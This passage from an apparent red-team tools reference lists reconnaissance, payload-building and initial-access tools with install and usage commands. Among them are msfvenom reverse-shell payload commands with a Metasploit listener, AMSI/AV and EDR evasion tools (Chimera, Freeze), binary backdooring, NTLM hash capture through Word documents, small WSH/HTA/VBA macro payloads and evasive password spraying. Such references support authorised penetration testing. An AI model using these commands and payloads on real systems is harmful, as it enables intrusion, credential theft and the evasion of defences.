\n\n```bash\ngobuster dir -u \"https:\u002F\u002Fgoogle.com\" -w \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fbig.txt --wildcard -b 301,401,403,404,500 -t 20\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png)\n\n### [๐Ÿ”™](#tool-list)[feroxbuster](https:\u002F\u002Fgithub.com\u002Fepi052\u002Fferoxbuster)\n\nA tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.\n\nFeroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...\n\n**Install: (Kali)** \n\n```bash\nsudo apt update && sudo apt install -y feroxbuster\n```\n\n**Install: (Mac)** \n\n```bash\ncurl -sL https:\u002F\u002Fraw.githubusercontent.com\u002Fepi052\u002Fferoxbuster\u002Fmaster\u002Finstall-nix.sh | bash\n```\n\n**Install: (Windows)** \n\n```bash\nInvoke-WebRequest https:\u002F\u002Fgithub.com\u002Fepi052\u002Fferoxbuster\u002Freleases\u002Flatest\u002Fdownload\u002Fx86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\\feroxbuster.zip\n.\\feroxbuster\\feroxbuster.exe -V\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fepi052.github.io\u002Fferoxbuster-docs\u002Fdocs\u002Finstallation\u002F).\n\n**Usage:** \n\n```bash\n# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\n.\u002Fferoxbuster -u http:\u002F\u002F127.1 -x pdf -x js,html -x php txt json,docx\n\n# Scan with headers\n.\u002Fferoxbuster -u http:\u002F\u002F127.1 -H Accept:application\u002Fjson \"Authorization: Bearer {token}\"\n\n# Read URLs from stdin\ncat targets | .\u002Fferoxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy requests through burpsuite\n.\u002Fferoxbuster -u http:\u002F\u002F127.1 --insecure --proxy http:\u002F\u002F127.0.0.1:8080\n```\n\n Full usage examples can be found [here](https:\u002F\u002Fepi052.github.io\u002Fferoxbuster-docs\u002Fdocs\u002Fexamples\u002F).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png)\n\n*Image used from https:\u002F\u002Fraw.githubusercontent.com\u002Fepi052\u002Fferoxbuster\u002Fmain\u002Fimg\u002Fdemo.gif*\n\n### [๐Ÿ”™](#tool-list)[CloudBrute](https:\u002F\u002Fgithub.com\u002F0xsha\u002FCloudBrute)\n\nA tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).\n\nFeatures:\n\n- Cloud detection (IPINFO API and Source Code)\n- Fast (concurrent)\n- Cross Platform (windows, linux, mac)\n- User-Agent Randomization\n- Proxy Randomization (HTTP, Socks5)\n\n**Install:** \n\nDownload the latest [release](https:\u002F\u002Fgithub.com\u002F0xsha\u002FCloudBrute\u002Freleases) for your system and follow the usage.\n\n**Usage:** \n\n```bash\n# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \".\u002Fdata\u002Fstorage_small.txt\"\n\n# Output results to file\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729172-5d58d005-85a8-49f2-8968-98b459961f81.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002F0xsha\u002FCloudBrute*\n\n### [๐Ÿ”™](#tool-list)[dnsrecon](https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fdnsrecon\u002F#dnsrecon)\n\ndnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.\n\n**Install:** \n\n```bash\nsudo apt install dnsrecon\n```\n\n**Usage:** \n\n```bash\ndnsrecon -d google.com\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png)\n\n### [๐Ÿ”™](#tool-list)[shodan.io](https:\u002F\u002Fwww.shodan.io\u002Fdashboard)\n\nShodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png)\n\n### [๐Ÿ”™](#tool-list)[AORT](https:\u002F\u002Fgithub.com\u002FD3Ext\u002FAORT)\n\nTool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FD3Ext\u002FAORT; cd AORT; pip3 install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 AORT.py -d google.com\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192070398-aae0217d-69c4-460b-ae4c-51b045551268.png)\n\n### [๐Ÿ”™](#tool-list)[spoofcheck](https:\u002F\u002Fgithub.com\u002FBishopFox\u002Fspoofcheck)\n\nA program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF\u002FDKIM emails.\n\nDomains are spoofable if any of the following conditions are met:\n\n- Lack of an SPF or DMARC record\n- SPF record never specifies `~all` or `-all`\n- DMARC policy is set to `p=none` or is nonexistent\n\n**Install:**\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FBishopFox\u002Fspoofcheck; cd spoofcheck; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n.\u002Fspoofcheck.py [DOMAIN]\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png)\n\n### [๐Ÿ”™](#tool-list)[AWSBucketDump](https:\u002F\u002Fgithub.com\u002Fjordanpotti\u002FAWSBucketDump)\n\nAWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.\n\n**Install:**\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fjordanpotti\u002FAWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```\nusage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n -h, --help show this help message and exit\n -D Download files. This requires significant diskspace\n -d If set to 1 or True, create directories for each host w\u002F results\n -t THREADS number of threads\n -l HOSTLIST\n -g GREPWORDS Provide a wordlist to grep for\n -m MAXSIZE Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\n```\n\n### [๐Ÿ”™](#tool-list)[GitHarvester](https:\u002F\u002Fgithub.com\u002Fmetac0rtex\u002FGitHarvester)\n\nNice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and\u002For projects.\n\n**Install:**\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fmetac0rtex\u002FGitHarvester; cd GitHarvester\n```\n\n**Usage:** \n\n```\n.\u002Fgitharvester.py\n```\n\n### [๐Ÿ”™](#tool-list)[truffleHog](https:\u002F\u002Fgithub.com\u002Fdxa4481\u002FtruffleHog)\n\nTruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.\n\n**Install (Binaries):** [Link](https:\u002F\u002Fgithub.com\u002Ftrufflesecurity\u002Ftrufflehog\u002Freleases)\n\n**Install (Go):**\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Ftrufflesecurity\u002Ftrufflehog.git; cd trufflehog; go install\n```\n\n**Usage:** \n\n```\ntrufflehog https:\u002F\u002Fgithub.com\u002Ftrufflesecurity\u002Ftest_keys\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png)\n\n### [๐Ÿ”™](#tool-list)[Dismap](https:\u002F\u002Fgithub.com\u002Fzhzyker\u002Fdismap)\n\nDismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web\u002Ftcp\u002Fudp, locate asset types, and is suitable for internal and external networks.\n\nDismap has a complete fingerprint rule base, currently including tcp\u002Fudp\u002Ftls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.\n\n**Install:** \n\nDismap is a binary file for Linux, MacOS, and Windows. Go to [Release](https:\u002F\u002Fgithub.com\u002Fzhzyker\u002Fdismap\u002Freleases) to download the corresponding version to run:\n\n```bash\n# Linux or MacOS\nchmod +x dismap-0.3-linux-amd64\n.\u002Fdismap-0.3-linux-amd64 -h\n\n# Windows\ndismap-0.3-windows-amd64.exe -h\n```\n\n**Usage:** \n\n```bash\n# Scan 192.168.1.1 subnet\n.\u002Fdismap -i 192.168.1.1\u002F24\n\n# Scan, output to result.txt and json output to result.json\n.\u002Fdismap -i 192.168.1.1\u002F24 -o result.txt -j result.json\n\n# Scan, Not use ICMP\u002FPING to detect surviving hosts, timeout 10 seconds\n.\u002Fdismap -i 192.168.1.1\u002F24 --np --timeout 10\n\n# Scan, Number of concurrent threads 1000\n.\u002Fdismap -i 192.168.1.1\u002F24 -t 1000\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fzhzyker\u002Fdismap*\n\n### [๐Ÿ”™](#tool-list)[enum4linux](https:\u002F\u002Fgithub.com\u002FCiscoCXSecurity\u002Fenum4linux)\n\nA tool for enumerating information from Windows and Samba systems.\n\nIt can be used to gather a wide range of information, including:\n\n- Domain and domain controller information\n- Local user and group information\n- Shares and share permissions\n- Security policies\n- Active Directory information\n\n**Install: (Apt)** \n\n```bash\nsudo apt install enum4linux\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FCiscoCXSecurity\u002Fenum4linux\ncd enum4linux\n```\n\n**Usage:** \n\n```bash\n# 'Do everything'\nenum4linux.pl -a 192.168.2.55\n\n# Obtain list of usernames (RestrictAnonymous = 0)\nenum4linux.pl -U 192.168.2.55\n\n# Obtain list of usernames (using authentication)\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n# Get a list of groups and their members\nenum4linux.pl -G 192.168.2.55\n\n# Verbose scan \nenum4linux.pl -v 192.168.2.55\n```\n\nFull usage information can be found in this [blog](https:\u002F\u002Flabs.portcullis.co.uk\u002Ftools\u002Fenum4linux\u002F).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png)\n\n*Image used from https:\u002F\u002Fallabouttesting.org\u002Fsamba-enumeration-for-penetration-testing-short-tutorial\u002F*\n\n### [๐Ÿ”™](#tool-list)[skanuvaty](https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc\u002Fskanuvaty)\n\nDangerously fast dns\u002Fnetwork\u002Fport scanner, created by [Esc4iCEscEsc](https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc), written in rust.\n\nYou will need a subdomains file. *E.g. [Subdomain wordlist by Sublist3r](https:\u002F\u002Fraw.githubusercontent.com\u002Faboul3la\u002FSublist3r\u002Fmaster\u002Fsubbrute\u002Fnames.txt)*.\n\n**Install:** \n\nDownload the latest release from [here](https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc\u002Fskanuvaty\u002Freleases).\n\n```bash\n# Install a wordlist\nsudo apt install wordlists\nls \u002Fusr\u002Fshare\u002Fdirb\u002Fwordlists\nls \u002Fusr\u002Fshare\u002Famass\u002Fwordlists\n```\n\n**Usage:** \n\n```bash\nskanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc\u002Fskanuvaty*\n\n### [๐Ÿ”™](#tool-list)[Metabigor](https:\u002F\u002Fgithub.com\u002Fj3ssie\u002Fmetabigor)\n\nMetabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.\n\n**Main Features:**\n\n- Searching information about IP Address, ASN and Organization.\n- Wrapper for running rustscan, masscan and nmap more efficient on IP\u002FCIDR.\n- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).\n- Get Summary about IP address (powered by [@thebl4ckturtle](https:\u002F\u002Fgithub.com\u002Ftheblackturtle))\n\n**Install:** \n\n```bash\ngo install github.com\u002Fj3ssie\u002Fmetabigor@latest\n```\n\n**Usage:** \n\n```bash\n# discovery IP of a company\u002Forganization\necho \"company\" | metabigor net --org -o \u002Ftmp\u002Fresult.txt\n\n# Getting more related domains by searching for certificate info\necho 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command\n\n# Only run rustscan with full ports\necho '1.2.3.4\u002F24' | metabigor scan -o result.txt\n\n# Reverse Whois to find related domains\necho 'example.com' | metabigor related -s 'whois'\n\n# Get Google Analytics ID directly from the URL\necho 'https:\u002F\u002Fexample.com' | metabigor related -s 'google-analytic'\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fj3ssie\u002Fmetabigor*\n\n### [๐Ÿ”™](#tool-list)[Gitrob](https:\u002F\u002Fgithub.com\u002Fmichenriksen\u002Fgitrob)\n\nGitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. \n\nGitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. \n\nThe findings will be presented through a web interface for easy browsing and analysis.\n\n**Note:** *Gitrob will need a Github access token in order to interact with the Github API. [Create a personal access token](https:\u002F\u002Fhelp.github.com\u002Farticles\u002Fcreating-a-personal-access-token-for-the-command-line\u002F) and save it in an environment variable in your .bashrc or similar shell configuration file:*\n\n```bash\nexport GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\n```\n\n**Install: (Go)** \n\n```bash\ngo get github.com\u002Fmichenriksen\u002Fgitrob\n```\n\n**Install: (Binary)** \n\nA [precompiled version](https:\u002F\u002Fgithub.com\u002Fmichenriksen\u002Fgitrob\u002Freleases) is available for each release.\n\n**Usage:** \n\n```bash\n# Run against org\ngitrob {org_name}\n\n# Saving session to a file\ngitrob -save ~\u002Fgitrob-session.json acmecorp\n\n# Loading session from a file\ngitrob -load ~\u002Fgitrob-session.json\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png)\n\n*Image used from https:\u002F\u002Fwww.uedbox.com\u002Fpost\u002F58828\u002F*\n\n### [๐Ÿ”™](#tool-list)[gowitness](https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness)\n\nGowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.\n\n**Install: (Go)** \n\n```bash\ngo install github.com\u002Fsensepost\u002Fgowitness@latest\n```\n\nFull installation information can be found [here](https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness\u002Fwiki\u002FInstallation).\n\n**Usage:** \n\n```bash\n# Screenshot a single website\ngowitness single https:\u002F\u002Fwww.google.com\u002F\n\n# Screenshot a cidr using 20 threads\ngowitness scan --cidr 192.168.0.0\u002F24 --threads 20\n\n# Screenshot open http services from an namp file\ngowitness nmap -f nmap.xml --open --service-contains http\n\n# Run the report server\ngowitness report serve\n```\n\nFull usage information can be found [here](https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness\u002Fwiki\u002FUsage).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness*\n\nResource Development\n====================\n\n### [๐Ÿ”™](#tool-list)[remoteInjector](https:\u002F\u002Fgithub.com\u002FJohnWoodman\u002Fremoteinjector)\n\nInjects link to remote word template into word document.\n\nThis Python-based utility modifies a .docx fileโ€™s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.\n\n[Related Blog Post](https:\u002F\u002Fjohn-woodman.com\u002Fresearch\u002Fvba-macro-remote-template-injection\u002F)\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FJohnWoodman\u002Fremoteinjector;cd remoteinjector\n```\n\n**Usage:** \n\n```bash\npython3 remoteinjector.py -w https:\u002F\u002Fexample.com\u002Ftemplate.dotm example.docx\n```\n\n### [๐Ÿ”™](#tool-list)[Chimera](https:\u002F\u002Fgithub.com\u002Ftokyoneon\u002FChimera)\n\nChimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.\n\n**Install:** \n\n```bash\nsudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https:\u002F\u002Fgithub.com\u002Ftokyoneon\u002Fchimera \u002Fopt\u002Fchimera\nsudo chown $USER:$USER -R \u002Fopt\u002Fchimera\u002F; cd \u002Fopt\u002Fchimera\u002F\nsudo chmod +x chimera.sh; .\u002Fchimera.sh --help\n```\n\n**Usage:** \n\n```bash\n.\u002Fchimera.sh -f shells\u002FInvoke-PowerShellTcp.ps1 -l 3 -o \u002Ftmp\u002Fchimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F209867736-5c35cec0-9227-4f18-a439-a5c954342818.png)\n\n### [๐Ÿ”™](#tool-list)[msfvenom](https:\u002F\u002Fwww.offensive-security.com\u002Fmetasploit-unleashed\u002FMsfvenom\u002F)\n\nMsfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.\n\n**Set Up Listener**\n\n```shell\nuse exploit\u002Fmulti\u002Fhandler \nset PAYLOAD windows\u002Fmeterpreter\u002Freverse_tcp \nset LHOST your-ip \nset LPORT listening-port \nrun\n```\n\n#### Msfvenom Commands\n\n**PHP:** \n\n```bash\nmsfvenom -p php\u002Fmeterpreter\u002Freverse_tcp lhost =192.168.0.9 lport=1234 R\n```\n\n**Windows:** \n\n```bash\nmsfvenom -p windows\u002Fshell\u002Freverse_tcp LHOST=\u003CIP> LPORT=\u003CPORT> -f exe > shell-x86.exe\n```\n\n**Linux:** \n\n```bash\nmsfvenom -p linux\u002Fx86\u002Fshell\u002Freverse_tcp LHOST=\u003CIP> LPORT=\u003CPORT> -f elf > shell-x86.elf\n```\n\n**Java:** \n\n```bash\nmsfvenom -p java\u002Fjsp_shell_reverse_tcp LHOST=\u003CIP> LPORT=\u003CPORT> -f raw > shell.jsp\n```\n\n**HTA:** \n\n```bash\nmsfvenom -p windows\u002Fshell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png)\n\n### [๐Ÿ”™](#tool-list)[Shellter](https:\u002F\u002Fwww.shellterproject.com\u002F)\n\nShellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.\n\nIt can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).\n\nShellter takes advantage of the original structure of the PE file and doesnโ€™t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.\n\nFull README information can be found [here](https:\u002F\u002Fwww.shellterproject.com\u002FDownloads\u002FShellter\u002FReadme.txt).\n\n**Install: (Kali)** \n\n```bash\napt-get update\napt-get install shellter\n```\n\n**Install: (Windows)** \n\nVisit the [download page](https:\u002F\u002Fwww.shellterproject.com\u002Fdownload\u002F) and install.\n\n**Usage:** \n\nJust pick a legit binary to backdoor and run Shellter.\n\nSome nice tips can be found [here](https:\u002F\u002Fwww.shellterproject.com\u002Ftipstricks\u002F).\n\nLots of community usage demos can be found [here](https:\u002F\u002Fwww.shellterproject.com\u002Fshellter-community-demos\u002F).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729343-612cde48-0ce1-48e6-b342-5252193a974c.png)\n\n*Image used from https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fshellter\u002Fimages\u002Fshellter.png*\n\n### [๐Ÿ”™](#tool-list)[Freeze](https:\u002F\u002Fgithub.com\u002Foptiv\u002FFreeze)\n\nFreeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. \n\nFreeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Foptiv\u002FFreeze\ncd Freeze\ngo build Freeze.go\n```\n\n**Usage:** \n\n```\n -I string\n Path to the raw 64-bit shellcode.\n -O string\n Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n -encrypt\n Encrypts the shellcode using AES 256 encryption\n -export string\n For DLL Loaders Only - Specify a specific Export function for a loader to have.\n -process string\n The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. Example 'notepad.exe' (default \"notepad.exe\")\n -sandbox\n Enables sandbox evasion by checking:\n Is Endpoint joined to a domain?\n Does the Endpoint have more than 2 CPUs?\n Does the Endpoint have more than 4 gigs of RAM?\n -sha256\n Provides the SHA256 value of the loaders (This is useful for tracking)\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png)\n\n*Image used from https:\u002F\u002Fwww.blackhatethicalhacking.com\u002Ftools\u002Ffreeze\u002F*\n\n### [๐Ÿ”™](#tool-list)[WordSteal](https:\u002F\u002Fgithub.com\u002F0x09AL\u002FWordSteal)\n\nThis script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.\n\nMicrosoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image. \n\n**Install:** \n\n```\ngit clone https:\u002F\u002Fgithub.com\u002F0x09AL\u002FWordSteal\ncd WordSteal\n```\n\n**Usage:** \n\n```bash\n# Generate document containing 'test.jpg' and start listener\n.\u002Fmain.py 127.0.0.1 test.jpg 1\n\n# Generate document containing 'test.jpg' and do not start listener\n.\u002Fmain.py 127.0.0.1 test.jpg 0\\n\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png)\n\n*Image used from https:\u002F\u002Fpentestit.com\u002Fwordsteal-steal-ntlm-hashes-remotely\u002F*\n\n### [๐Ÿ”™](#tool-list)[NTAPI Undocumented Functions](http:\u002F\u002Fundocumented.ntinternals.net\u002F)\n\nThis site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system. \n\nIt can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.\n\nWhen developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.\n\n**Usage:** \n\nVisit [http:\u002F\u002Fundocumented.ntinternals.net\u002F](http:\u002F\u002Fundocumented.ntinternals.net\u002F)\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002F41b424f3-053c-440b-b0fd-235e95980d9a)\n\n*Image used from http:\u002F\u002Fundocumented.ntinternals.net\u002F*\n\n### [๐Ÿ”™](#tool-list)[Kernel Callback Functions](https:\u002F\u002Fcodemachine.com\u002Farticles\u002Fkernel_callback_functions.html)\n\nThis technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances. \n\nMost of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers. \n\nThe undocumented functions are described briefly whereas the documented ones are just listed here for reference.\n\n**Usage:** \n\nVisit [https:\u002F\u002Fcodemachine.com\u002Farticles\u002Fkernel_callback_functions.html](https:\u002F\u002Fcodemachine.com\u002Farticles\u002Fkernel_callback_functions.html)\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002Fb7532b7d-1abc-4af6-be92-f6f78d24a788)\n\n*Image used from https:\u002F\u002Fcodemachine.com*\n\n### [๐Ÿ”™](#tool-list)[OffensiveVBA](https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t\u002FOffensiveVBA)\n\nA collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.\n\n**Usage:** \n\nVisit [https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t\u002FOffensiveVBA#templates-in-this-repo](https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t\u002FOffensiveVBA#templates-in-this-repo)\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002F7f7ad942-48d7-42e7-a3cc-55ec84139058)\n\n*Image used from https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t*\n\n### [๐Ÿ”™](#tool-list)WSH\n\n**Creating payload:** \n\n```vbs\nSet shell = WScript.CreateObject(\"Wscript.Shell\")\nshell.Run(\"C:\\Windows\\System32\\calc.exe \" & WScript.ScriptFullName),0,True\n```\n\n**Execute:** \n\n```bash\nwscript payload.vbs\ncscript.exe payload.vbs\nwscript \u002Fe:VBScript payload.txt \u002F\u002FIf .vbs files are blacklisted\n```\n\n### [๐Ÿ”™](#tool-list)HTA\n\n**Creating payload:**\n\n```html\n\u003Chtml>\n\u003Cbody>\n\u003Cscript>\n\tvar c= 'cmd.exe'\n\tnew ActiveXObject('WScript.Shell').Run(c);\n\u003C\u002Fscript>\n\u003C\u002Fbody>\n\u003C\u002Fhtml>\n```\n\n**Execute:** Run file\n\n### [๐Ÿ”™](#tool-list)VBA\n\n**Creating payload:**\n\n```python\nSub calc()\n\tDim payload As String\n\tpayload = \"calc.exe\"\n\tCreateObject(\"Wscript.Shell\").Run payload,0\nEnd Sub\n```\n\n**Execute:** Set function to Auto_Open() in macro enabled document\n\nInitial Access\n====================\n\n### [๐Ÿ”™](#tool-list)[CredMaster](https:\u002F\u002Fgithub.com\u002Fknavesec\u002FCredMaster)\n\nLaunch a password spray \u002F brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.\n\nCredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.\n\nFeatures:\n- Fully supports all AWS Regions\n- Automatically generates APIs for proxy pass-through\n- Spoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers\n- Multi-threaded processing\n- Password delay counters & configuration for lockout policy evasion\n- Easily add new plugins\n- Fully anonymous\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fknavesec\u002FCredMaster;cd CredMaster;pip install -r requirements.txt\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fwhynotsecurity.com\u002Fblog\u002Fcredmaster\u002F#setup).\n\n**Usage:** \n\n```bash\npython3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config config.json\n```\n\nThis tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: https:\u002F\u002Fbond-o.medium.com\u002Faws-pass-through-proxy-84f1f7fa4b4b\n\n![credmaster](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Ff678cca4-7a53-41e7-9323-51e8efd0e6ba)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fknavesec\u002FCredMaster\u002Fwiki*\n\n### [๐Ÿ”™](#tool-list)[TREVORspray](https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray)\n\nTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\n\n**Install:** \n\n```bash\npip install https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray\n```\n\n**Usage:** 